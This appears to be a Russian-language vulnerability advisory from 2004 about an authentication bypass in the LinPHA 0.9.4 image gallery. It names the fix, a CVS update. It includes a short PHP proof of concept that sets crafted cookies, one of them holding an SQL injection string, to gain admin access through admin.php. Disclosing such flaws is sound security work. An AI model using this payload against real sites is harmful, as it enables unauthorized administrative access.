Удаленный административный доступ в LinPHA галереи изображений

Дата публикации:
01.08.2004
Всего просмотров:
844
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
LinPHA 0.x
Уязвимые версии: LinPHA 0.9.4

Описание: Уязвимость в LinPHA галереи изображений позволяет удаленному пользователю получить административный доступ к приложению.

Удаленный пользователь может установить специально обработанные значения куки и затем обратится к 'admin.php' сценарию, чтобы успешно аутентифицироваться в приложении. Пример:

<?PHP
setcookie("linpha_userid","1",time()+86400*365,'/linpha');
setcookie("linpha_password","' or '3'='3",time()+86400*365,'/linpha');
?>

URL производителя:http://linpha.sourceforge.net/

Решение:Установите обновление, доступное через CVS.

Ссылки: Linpha 0.9.4: authentication bypass

или введите имя

CAPTCHA